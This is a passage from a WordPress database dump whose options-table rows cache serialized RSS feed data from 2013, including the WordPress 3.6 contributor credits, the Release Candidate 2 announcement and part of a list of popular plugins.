href=\"http://profiles.wordpress.org/pdclark\">Paul Clark</a>, <a href=\"http://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"http://profiles.wordpress.org/petemall\">Pete Mall</a>, <a href=\"http://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"http://profiles.wordpress.org/phill_brown\">Phill Brown</a>, <a href=\"http://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"http://profiles.wordpress.org/pollett\">Pollett</a>, <a href=\"http://profiles.wordpress.org/nprasath002\">Prasath Nadarajah</a>, <a href=\"http://profiles.wordpress.org/programmin\">programmin</a>, <a href=\"http://profiles.wordpress.org/rachelbaker\">rachelbaker</a>, <a href=\"http://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"http://profiles.wordpress.org/redpixelstudios\">redpixelstudios</a>, <a href=\"http://profiles.wordpress.org/reidburke\">reidburke</a>, <a href=\"http://profiles.wordpress.org/retlehs\">retlehs</a>, <a href=\"http://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"http://profiles.wordpress.org/rlerdorf\">rlerdorf</a>, <a href=\"http://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"http://profiles.wordpress.org/roulandf\">roulandf</a>, <a href=\"http://profiles.wordpress.org/rovo89\">rovo89</a>, <a href=\"http://profiles.wordpress.org/ryanduff\">Ryan Duff</a>, <a href=\"http://profiles.wordpress.org/ryanhellyer\">Ryan Hellyer</a>, <a href=\"http://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"http://profiles.wordpress.org/zeo\">Safirul Alredha</a>, <a href=\"http://profiles.wordpress.org/saracannon\">sara cannon</a>, <a href=\"http://profiles.wordpress.org/scholesmafia\">scholesmafia</a>, <a href=\"http://profiles.wordpress.org/sc0ttkclark\">Scott Kingsley Clark</a>, <a href=\"http://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"http://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"http://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"http://profiles.wordpress.org/tenpura\">Seisuke Kuraishi (tenpura)</a>, <a href=\"http://profiles.wordpress.org/sergej\">Sergej</a>, <a href=\"http://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"http://profiles.wordpress.org/sim\">Simon Hampel</a>, <a href=\"http://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"http://profiles.wordpress.org/siobhan\">Siobhan</a>, <a href=\"http://profiles.wordpress.org/sirzooro\">sirzooro</a>, <a href=\"http://profiles.wordpress.org/slene\">slene</a>, <a href=\"http://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"http://profiles.wordpress.org/srinig\">SriniG</a>, <a href=\"http://profiles.wordpress.org/stephenh1988\">Stephen Harris</a>, <a href=\"http://profiles.wordpress.org/storkontheroof\">storkontheroof</a>, <a href=\"http://profiles.wordpress.org/sunnyratilal\">Sunny Ratilal</a>, <a href=\"http://profiles.wordpress.org/sweetie089\">sweetie089</a>, <a href=\"http://profiles.wordpress.org/tar\">Tar</a>, <a href=\"http://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"http://profiles.wordpress.org/thomasvanderbeek\">Thomas van der Beek</a>, <a href=\"http://profiles.wordpress.org/n7studios\">Tim Carr</a>, <a href=\"http://profiles.wordpress.org/tjsingleton\">tjsingleton</a>, <a href=\"http://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"http://profiles.wordpress.org/toscho\">toscho</a>, <a href=\"http://profiles.wordpress.org/taupecat\">Tracy Rotton</a>, <a href=\"http://profiles.wordpress.org/travishoffman\">TravisHoffman</a>, <a href=\"http://profiles.wordpress.org/uuf6429\">uuf6429</a>, <a href=\"http://profiles.wordpress.org/lightningspirit\">Vitor Carvalho</a>, <a href=\"http://profiles.wordpress.org/wojtek\">wojtek</a>, <a href=\"http://profiles.wordpress.org/wpewill\">wpewill</a>, <a href=\"http://profiles.wordpress.org/wraithkenny\">WraithKenny</a>, <a href=\"http://profiles.wordpress.org/wycks\">wycks</a>, <a href=\"http://profiles.wordpress.org/xibe\">Xavier Borderie</a>, <a href=\"http://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"http://profiles.wordpress.org/thelastcicada\">Zachary Brown</a>, <a href=\"http://profiles.wordpress.org/tollmanz\">Zack Tollman</a>, <a href=\"http://profiles.wordpress.org/zekeweeks\">zekeweeks</a>, <a href=\"http://profiles.wordpress.org/ziegenberg\">ziegenberg</a>, and <a href=\"http://profiles.wordpress.org/viniciusmassuchetto\">viniciusmassuchetto</a>.</p>\n<p>Time to upgrade!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://wordpress.org/news/2013/08/oscar/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 3.6 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wordpress.org/news/2013/07/wordpress-3-6-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wordpress.org/news/2013/07/wordpress-3-6-release-candidate-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 24 Jul 2013 07:25:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2649\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:341:\"The second release candidate for WordPress 3.6 is now available for download and testing. We&#8217;re down to only a few remaining issues, and the final release should be available in a matter of days. In RC2, we&#8217;ve tightened up some aspects of revisions, autosave, and the media player, and fixed some bugs that were spotted [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mark Jaquith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1325:\"<p>The second release candidate for WordPress 3.6 is now available for download and testing.</p>\n<p>We&#8217;re down to only a few remaining issues, and the final release should be available in a matter of days. In RC2, we&#8217;ve tightened up some aspects of revisions, autosave, and the media player, and fixed some bugs that were spotted in RC1. Please test this release candidate as much as you can, so we can deliver a smooth final release!</p>\n<p><strong>Think you&#8217;ve found a bug?</strong> Please post to the <a href=\"http://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a>.</p>\n<p><strong>Developers,</strong> please continue to test your plugins and themes, so that if there is a compatibility issue, we can figure it out before the final release. You can find our <a href=\"http://core.trac.wordpress.org/report/6\">list of known issues here</a>.</p>\n<p>To test WordPress 3.6, try the <a href=\"http://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can <a href=\"http://wordpress.org/wordpress-3.6-RC2.zip\">download the release candidate here (zip)</a>.</p>\n<p><em>Revisions so smooth</em><br />\n<em>We autosave your changes</em><br />\n<em>Data loss begone!</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wordpress.org/news/2013/07/wordpress-3-6-release-candidate-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:31:\"http://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 03 Nov 2013 08:53:22 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:10:\"x-pingback\";s:36:\"http://wordpress.org/news/xmlrpc.php\";s:13:\"last-modified\";s:29:\"Tue, 29 Oct 2013 21:04:59 GMT\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20131101083921\";}', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3224, '_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1383512002', 'no'),
(3225, '_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109', '1383512002', 'no'),
(3226, '_transient_feed_b9388c83948825c1edaef0d856b7b109', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n	\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 03 Nov 2013 08:24:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"8321@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using the WordPress SEO plugin by Yoast.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2141@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"753@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your Wordpress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"15@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"http://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"132@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"Arnee\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"NextGEN Gallery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/plugins/nextgen-gallery/#post-1169\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2007 20:08:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"1169@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:122:\"The most popular WordPress gallery plugin and one of the most popular plugins of all time with over 7.5 million downloads.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Alex Rabe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2572@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html 